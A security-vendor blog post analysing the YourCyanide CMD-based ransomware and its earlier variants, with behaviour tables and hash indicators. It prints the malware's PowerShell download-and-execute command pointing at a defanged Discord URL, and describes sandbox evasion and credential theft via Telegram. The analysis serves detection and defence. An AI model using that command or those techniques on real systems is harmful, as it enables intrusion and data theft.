Ransomware
YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation
The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.
The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.
In this blog entry, we will analyze YourCyanide, the latest variant of the CMD-based ransomware family that started with GonnaCope. YourCyanide is a sophisticated ransomware that integrates PasteBin, Discord, and Microsoft document links as part of its payload download routine. YourCyanide contains multiple layers of obfuscation and takes advantage of custom environment variables and the Enable Delayed Expansion function to hide its activities. As part of its evasion strategy, YourCyanide will also pass through different files, downloading the succeeding files via Discord and Pastebin with each step before eventually downloading the main payload.
Note that the ransomware is still currently under development, so some portions of the routine — like the actual encryption portion — are not finalized (YourCyanide currently renames the files under specific directories, but does not encrypt anything).
The earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This variant possessed the ability to overwrite its victim's files — however, this was limited to the current directory in which the ransomware was being executed.
Upon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in the compromised network notifying them of the infiltration. Along with this, another message was sent stating that "Kekware and Kekpop were just the begining" — indicating that the author was preparing a more sophisticated variant of the original ransomware.
Table 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.
Date earliest sample was uploaded to VirusTotal |
Ransomware sample |
07 Apr 2022 |
GonnaCope |
07 May 2022 |
Kekpop |
11 May 2022 |
Kekware |
13 May 2022 |
YourCyanide |
Table 1. CMD-based ransomware samples and their date of upload to VirusTotal
YourCyanide technical analysis
It initially arrives as an LNK file that contains the following PowerShell script for downloading the "YourCyanide.exe" 64-bit executable from Discord and executing it:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')"; start YourCyanide.exe"
This 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.
The dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename (YourCyanide.cmd).
The ransomware will create a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce for cleanup purposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader from the machine.
The downloaded script file contains 10 layers of obfuscated code, with each layer being needed to deobfuscate the succeeding layer. It takes advantage of the Enable Extensions and Enable Delayed Extensions commands, causing variables within a batch file to be expanded at execution time rather than at parse time.
The malware uses following format for its obfuscation technique:
%parameter:~index of character, number of characters to take%
%Kesik:~19,1%, will return 1 character from the index value 19 of parameter Kesik
Upon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command Prompt windows.
It will then try to add a user "session" to the Administrators group using the net localgroup command.
It also creates an autostart mechanism for persistence by creating a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and then copying itself to the Startup directory. It also disables Task Manager by modifying its registry entry.
It then checks if %SystemDrive%\AutoExec.bat exists, and if so, it deletes the original and then copies itself and sets the file to read only, hidden, and as a system file.
It also avoids machines with the following usernames, some of which, according to our research, are usernames used by malware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:
- a.monaldo
- George
- george
- help
- karolisliucveikis
- Soumy
- guent
After checking the username of the infected machine, it drops and executes a batch file in UserProfile\Documents\black.bat. This batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible while the malware is running.
YourCyanide also terminates several services and security applications by concatenating variables to form the strings "net stop," "norton," "symantec," and "McAfee."
It then swaps the mouse button using the SwapMouseButton Export function of the user32.dll file.
After terminating applications, it renames files from the following directories to <random number>*<random number>.cyn and overwrites its contents to a random number using a built-in variable in CMD shell called %random%.
- %MyDesktop%
- %MyDocuments%
- %MyMusic%
- %MyPictures%
- %MyVideos%
- %Downloads%
Although no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed — especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still currently under development, it’s likely that the malware authors are still finalizing the encryption portion of the routine.
It then creates the following ransom notes and drops them into %MyDesktop%:
- YcynNote.txt
- other.txt
It features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to win.ini and system.ini.
After performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for rendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening.
YourCyanide is also capable of spreading via email and to different drives. It creates two VBScript files, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):
- I Have a crush on you
- Check This Out
It then copies itself to the following drives or directories:
- D:
- E:
- F:
- G:
- H:
- %UserProfile%
YourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18.
The ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections via the netsh advfirewall function.
It then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.
The ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine. Like the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its autostart mechanism by producing a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by copying itself to the Startup directory.
The malware uses the Telegram chatbot API to exfiltrate the stolen information and sets it to variable "Webhook"
It downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt, which contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.
It also collects the following machine information and stores it in userdata.txt:
- IP addresses
- MAC addresses
- CPU Information
- Memory Size
- Partition information
- System specifications
- OS product key
- Currently running processes
Both Tokens.txt and userdata.txt will then be sent via Telegram chatbot API using the curl command.
We also discovered that YourCyanide exfiltrates Minecraft-related credentials.
Finally, it downloads another executable from Google Docs and executes it using the parameter "/stext ForME.txt". ForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a sample can't be sourced, we noticed that it is run using the same parameter as the sample "passwords.exe," which is also used by the earlier Kekpop variant. The parameter "/stext" is employed when executing the file, which is similar to the WebBrowserPassView application used to retrieve credentials stored by various web browsers such as Internet Explorer (Version 4.0 - 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.
The file created from executing passwords.exe contains saved passwords that are stored in Google Chrome.
Avoiding usernames
Of the usernames this malware avoids, three in particular stand out. Namely: a.monaldo, karolisliucveikis, and soumy. Upon further research, we discovered that these are usernames from sandbox environments.
The username of the sandbox machine used by Hunter Yomi
The username of the sandbox machine used by PCRisk
Variant Comparison
The team analyzed these CMD-based ransomwares and came up with the following table that compares each variant and their differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web browsers and list of applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file that temporarily causes the machine to become inaccessible while the malware executes its payload. We also observed that the BTC address used by GonnaCope is different from the BTC address of the succeeding variants and it contains a different ransom note format. The variants also differ in their delivery — shifting between arriving as an archive, executable files, or LNK files that drop the CMD-based ransomware. The payloads are also located in different parts of the chain, with some being found in the main CMD file, while others are found in files that are downloaded from Pastebin and Discord.
Behavior |
GonnaCope |
Kekware |
Kekpop |
YourCyanide |
Creates auto-start mechanism |
Yes |
Yes |
Yes |
Yes |
Disables task manager |
Yes |
Yes |
Yes |
Yes |
Checks the username of the machine |
No |
Yes |
Yes |
Yes |
Creates and executes black.bat to continuously turn on Blank Screen Saver |
No |
Yes |
Yes |
Yes |
Stops services |
Yes |
Yes |
Yes |
Yes |
Terminates applications |
Yes |
Yes |
Yes |
Yes |
Swaps mouse buttons |
Yes |
Yes |
Yes |
Yes |
Renames files |
GonnaCope.cope |
<Random>.<file extension>.<Random>.cyn |
<Random>.<file extension>.<Random>.kekpop |
<Random>.<file extension>.<Random>.cyn |
Gathers a list of installed applications |
No |
Yes |
Yes |
Yes |
Collects machine information |
Yes |
Yes |
Yes |
Yes |
Collects token access data |
Yes |
Yes |
Yes |
Yes |
Collects passwords saved in web browsers |
No |
Yes |
Yes |
Yes |
Sends an email with a copy of itself as an attachment |
Yes |
Yes |
Yes |
Yes |
Subject of sent email |
Is this you? |
I Have a crush on you |
I Have a crush on you |
I Have a crush on you |
Copies itself in drives |
Yes |
Yes |
Yes |
Yes |
Enables RDP connection |
No |
Yes |
Yes |
Yes |
Ransom note message |
Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key |
Q: What happened to my files |
Q: What happened to my files? Q: how can i get them back? Q: What happens if i dont pay? Q: Is this related to kpop? |
Q: What happened to my files? |
Other messages |
kekpop is on your network |
Kekware and kekpop were just the beginning |
||
BTC wallet used |
bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll |
bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf |
bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf |
bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf |
Conclusion
The continued use of heavily obfuscated script results in very low detections for these CMD-based ransomware, making it easier to compromise their victims’ machines. Even if the technique is not new, the use of multilayer custom environment variables for obfuscation is highly effective in avoiding detection. These ransomware variants are also capable of downloading multiple payloads, performing lateral movement via emails, and using Discord, Pastebin and even Microsoft document links.
From our analysis, we are able to infer that the malware author is actively monitoring the reports created by malware researchers by taking note of the usernames found in their sandbox logs and reports, and including them in the evasion list of usernames and machines that is part of the initialization process of the malware being used.
Ransomware variants that possess multiple capabilities — such as the one analyzed in this blog entry — are gaining popularity. While YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework.
It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.
Trend Micro solutions
A multilayered approach can help organizations defend against ransomware attacks using security technologies that can detect malicious components and suspicious behavior.
- Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block suspicious behavior and tools before the ransomware can do any damage.
- Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning.
- Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware.
- Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection.
Indicators of Compromise
GONNACOPE |
||
File |
SHA256 |
Detection |
GonnaCope.Bat |
ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968 |
Trojan.BAT.GONNACOPE.A |
GonnaCope.Bat |
0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122 |
Trojan.BAT.GONNACOPE.THEOEBB |
GonnaCopeDL |
f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3 |
Trojan.MSIL.GONNACOPE.A |
GonnaCopeCryptor |
2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280 |
Ransom.MSIL.GONNACOPE.YXCEE |
GonnaCope |
7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7 |
TrojanSpy.MSIL.GONNACOPE.A |
GonnaCopeRansNote |
7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374 |
Ransom.MSIL.GONNACOPE.A.note |
mail.vbs |
26bde18048c32f6612d8d76b8696b2ce59db227913dccd51f696b51640ee11e9 |
Worm.VBS.GONNACOPE.A |
msg.vbs |
ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a |
PUA.VBS.GonnaLoop.A |
msgbox.vbs |
d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54 |
PUA.VBS.GonnaLoop.A |
nokeyboard.reg |
a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e |
PUA.Win32.Disabler.A |
Readme.txt |
9c39b7535b527df3b70800562bad98dc2e046de321fe3914dab896eda753cf38 |
Ransom.Win32.GONNACOPE.YXCEW.note |
downloader.vbs |
45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083 |
Trojan.VBS.GONNACOPE.A |
KEKPOP |
||
File |
SHA256 |
Detection |
Arrival |
c8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262 |
Trojan.BAT.KEKPOP.THEACBB |
296ba1469d072c37c6361fe80ba396a92f6461b9562103a3b5a20841d0757722 |
||
Main File |
bfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f |
Ransom.BAT.KEKPOP.THEAABB |
f8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d |
||
1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54 |
||
d2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56 |
||
Dropped BAT File 1 |
|
Trojan.BAT.KEKPOP.THEACBB |
Dropped BAT File 2 |
9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 |
TrojanSpy.BAT.KEKPOP.THEACBB |
Dropped BAT File 3 |
7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b |
Trojan.BAT.KEKPOP.THEACBB |
Dropped Text File |
|
Ransom.BAT.KEKPOP.THEACBB.note |
Dropped HTML File |
|
Ransom.HTML.KEKPOP.THEACBB.note |
Passwords.exe |
53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 |
HackTool.Win32.NirsoftPT.SM |
GetToken.exe |
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 |
Trojan.MSIL.TOKENSTEALER.YXCES |
kekpopdicord.exe |
e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913 |
Trojan.Win64.KEKPOP.YXCET |
|
|
Trojan.BAT.KEKPOP.YXCEZ |
KEKWARE |
||
File |
SHA256 |
Detection |
Arrival |
3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259 |
Trojan.PS1.KEKPOP.YXCEST |
23269070507a70c34a4e219f9be19943211ed38eec4a9ce2b3a49bf76676a5e3 |
Trojan.PS1.KEKPOP.YXCEST |
|
Main File |
e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78 |
Trojan.BAT.KEKPOP.YXCEST |
YcynNote.txt |
602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc |
Ransom.BAT.KEKPOP.YXCEST.note |
rAndom.cmd |
7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b |
Trojan.BAT.KEKPOP.THEACBB |
cynlog.cmd |
9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 |
TrojanSpy.BAT.KEKPOP.THEACBB |
Passwords.exe |
53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 |
HackTool.Win32.NirsoftPT.SM |
GetToken.exe |
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 |
Trojan.MSIL.TOKENSTEALER.YXCES |
black.bat |
07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 |
Trojan.BAT.KEKPOP.YXCEST |
loveletter.vbs |
f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 |
Worm.VBS.MASSMAIL.YXCEST |
mail.vbs |
080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 |
Worm.VBS.MASSMAIL.YXCEST |
fasdgfsdga.cmd |
56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83 |
Trojan.BAT.POWLOAD.TIAOELC |
YOURCYANIDE |
||
File |
SHA256 |
Detection |
LNK |
31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad |
Trojan.LNK.KEKPOP.YXCEST |
9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe |
Trojan.LNK.KEKPOP.YXCERT |
|
c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 |
Trojan.LNK.KEKPOP.YXCERT |
|
f9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649 |
Trojan.LNK.KEKPOP.YXCERT |
|
Win64 EXE Dropper |
8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669 |
Trojan.Win64.KEKPOP.YXCEST |
d51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c |
Trojan.Win64.KEKPOP.YXCERT |
|
6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e |
Trojan.Win64.KEKPOP.YXCERT |
|
2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3ce3f8 |
Trojan.Win64.KEKPOP.YXCERT |
|
a180c31666788fb6a7da421a743bb1c487099297ec06f2bdd841f342021f3763 |
Trojan.Win64.KEKPOP.YXCERT |
|
Downloader of the payload |
b43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace |
Trojan.PS1.KEKPOP.YXCEST |
6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25 |
Trojan.LNK.KEKPOP.YXCERT |
|
Main File (YourCyanide.cmd) |
6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 |
Trojan.BAT.KEKPOP.AB |
f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 |
Ransom.BAT.KEKPOP.YXCERT |
|
8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 |
Ransom.BAT.KEKPOP.YXCERT |
|
67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf |
Ransom.BAT.KEKPOP.YXCERT |
|
a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c |
Ransom.BAT.KEKPOP.YXCERT |
|
0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 |
Ransom.BAT.KEKPOP.YXCERT |
|
black.bat |
07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 |
Trojan.BAT.KEKPOP.YXCEST |
ycynlog.cmd |
298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c |
TrojanSpy.BAT.KEKPOP.YXCEST |
YcynNote.txt |
4e455d4b353c7cce0155ce1050afc30d064fd93c57bc6428eb3cd988ecd855f0 |
Ransom.BAT.KEKPOP.YXCERT.note |
other.txt |
a4c3412ac96061561c6cf05a259dd14e5151fe66eee115ff154d6a0366ba1a12 |
N/A - non-malicious component |
loveletter.vbs |
f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 |
Worm.VBS.MASSMAIL.YXCEST |
mail.vbs |
080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 |
Worm.VBS.MASSMAIL.YXCEST |
GetToken.exe |
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 |
Trojan.MSIL.TOKENSTEALER.YXCES |
ForMe.exe |
|
N/A |
|
316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2 |
Trojan.LNK.KEKPOP.YXCEST |
6a95f52d228316f9b48618a1c728e1c47ec71843e5b4cfb76ab3ef86dcd8cf8c |
Trojan.LNK.KEKPOP.YXCEST |
|
Read_Me.txt.cmd |
77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22ce523af818cd |
Trojan.BAT.POWLOAD.TIAOELB |
Main File (WinBugsFix.cmd) |
40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191 |
Ransom.BAT.KEKPOP.YXCEST |
|
b0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272 |
Ransom.BAT.KEKPOP.YXCEST |